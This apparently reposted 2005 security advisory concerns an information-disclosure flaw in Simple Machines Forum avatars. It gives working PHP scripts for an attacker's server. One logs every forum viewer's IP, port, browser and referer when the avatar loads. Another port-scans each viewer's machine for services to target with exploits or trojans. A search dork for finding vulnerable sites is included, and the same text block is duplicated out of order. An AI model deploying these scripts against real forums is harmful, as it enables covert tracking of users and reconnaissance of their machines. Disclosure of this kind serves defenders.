When forum users view a page that should show the avatar, a new line is appended
to log[date].txt on [evil_site] server, like this:
08.31.05 04.09 - 192.168.1.1:8562 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-http://[target]/[path]/[page]-GET--it-/image.php
so an external user can monitor in details the forum activity, user ip addresses, have informations on OS and browsers used and so on
the evil script could check for open ports/services on target machines to send
them exploit code or proxies, trojan ports, do some other stuff, just an example:
<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 1);
$log="log".date("Ymd").".txt";
$fp=fopen($log,'a');
fputs($fp,'open ports on '.$REMOTE_ADDR.": ");
$portlist="23;135;139;445;1080;3128;8080;12345";
$ports=explode(";",$portlist);
for ($i=0; $i<=count($ports)-1; $i++)
{
$ock=fsockopen($REMOTE_ADDR,$ports[$i]);
if ($ock) {fputs($fp,$ports[$i].' '); fclose($ock);}
}
fputs($fp,"\r\n");
fclose($fp);
//then a lot of creativity ;)
?>
information disclosure
software:
site: http://www.simplemachines.org/
information disclosure:
a user can choose an sumbit an avatar url like this:
http://[evil_site]/image.php
where image.php is a file like this:
<?php
$log="log".date("Ymd").".txt";
$fp=fopen($log,'a');
fputs($fp,$REMOTE_ADDR.":".$REMOTE_PORT." - ".$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRI
NG."-".$HTTP_ACCEPT_LANGUAGE."-".$REQUEST_URI."\r\n");
fclose($fp)
?>
When forum users view a page that should show the avatar, a new line is appended
to log[date].txt on [evil_site] server, like this:
08.31.05 04.09 - 192.168.1.1:8562 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-http://[target]/[path]/[page]-GET--it-/image.php
so an external user can monitor in details the forum activity, user ip addresses, have informations on OS and browsers used and so on
the evil script could check for open ports/services on target machines to send
them exploit code or proxies, trojan ports, do some other stuff, just an example:
<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 1);
$log="log".date("Ymd").".txt";
$fp=fopen($log,'a');
fputs($fp,'open ports on '.$REMOTE_ADDR.": ");
$portlist="23;135;139;445;1080;3128;8080;12345";
$ports=explode(";",$portlist);
for ($i=0; $i<=count($ports)-1; $i++)
{
$ock=fsockopen($REMOTE_ADDR,$ports[$i]);
if ($ock) {fputs($fp,$ports[$i].' '); fclose($ock);}
}
fputs($fp,"\r\n");
fclose($fp);
//then a lot of creativity ;)
?>
googledork: "Powered by SMF"
rgod
site: http://rgod.altervista.org
mail: retrogod (at) aliceposta (dot) it [email concealed]
original advisory: http://rgod.altervista.org/smf105.html
[ reply ]